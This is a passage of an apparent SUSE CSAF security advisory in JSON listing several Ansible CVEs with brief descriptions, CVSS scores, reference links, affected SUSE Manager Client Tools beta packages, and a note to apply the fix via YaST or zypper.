"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "low"
}
],
"title": "CVE-2016-8647"
},
{
"cve": "CVE-2016-9587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-9587"
}
],
"notes": [
{
"category": "general",
"text": "Ansible before versions 2.1.4, 2.2.1 is vulnerable to an improper input validation in Ansible\u0027s handling of data sent from client systems. An attacker with control over a client system being managed by Ansible and the ability to send facts back to the Ansible server could use this flaw to execute arbitrary code on the Ansible server using the Ansible server privileges.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-9587",
"url": "https://www.suse.com/security/cve/CVE-2016-9587"
},
{
"category": "external",
"summary": "SUSE Bug 1019021 for CVE-2016-9587",
"url": "https://bugzilla.suse.com/1019021"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "important"
}
],
"title": "CVE-2016-9587"
},
{
"cve": "CVE-2017-7550",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2017-7550"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in the way Ansible (2.3.x before 2.3.3, and 2.4.x before 2.4.1) passed certain parameters to the jenkins_plugin module. Remote attackers could use this flaw to expose sensitive information from a remote host\u0027s logs. This flaw was fixed by not allowing passwords to be specified in the \"params\" argument, and noting this in the module documentation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2017-7550",
"url": "https://www.suse.com/security/cve/CVE-2017-7550"
},
{
"category": "external",
"summary": "SUSE Bug 1035124 for CVE-2017-7550",
"url": "https://bugzilla.suse.com/1035124"
},
{
"category": "external",
"summary": "SUSE Bug 1065872 for CVE-2017-7550",
"url": "https://bugzilla.suse.com/1065872"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "important"
}
],
"title": "CVE-2017-7550"
},
{
"cve": "CVE-2018-10874",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2018-10874"
}
],
"notes": [
{
"category": "general",
"text": "In ansible it was found that inventory variables are loaded from current working directory when running ad-hoc command which are under attacker\u0027s control, allowing to run arbitrary code as a result.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2018-10874",
"url": "https://www.suse.com/security/cve/CVE-2018-10874"
},
{
"category": "external",
"summary": "SUSE Bug 1097775 for CVE-2018-10874",
"url": "https://bugzilla.suse.com/1097775"
},
{
"category": "external",
"summary": "SUSE Bug 1099805 for CVE-2018-10874",
"url": "https://bugzilla.suse.com/1099805"
},
{
"category": "external",
"summary": "SUSE Bug 1099808 for CVE-2018-10874",
"url": "https://bugzilla.suse.com/1099808"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
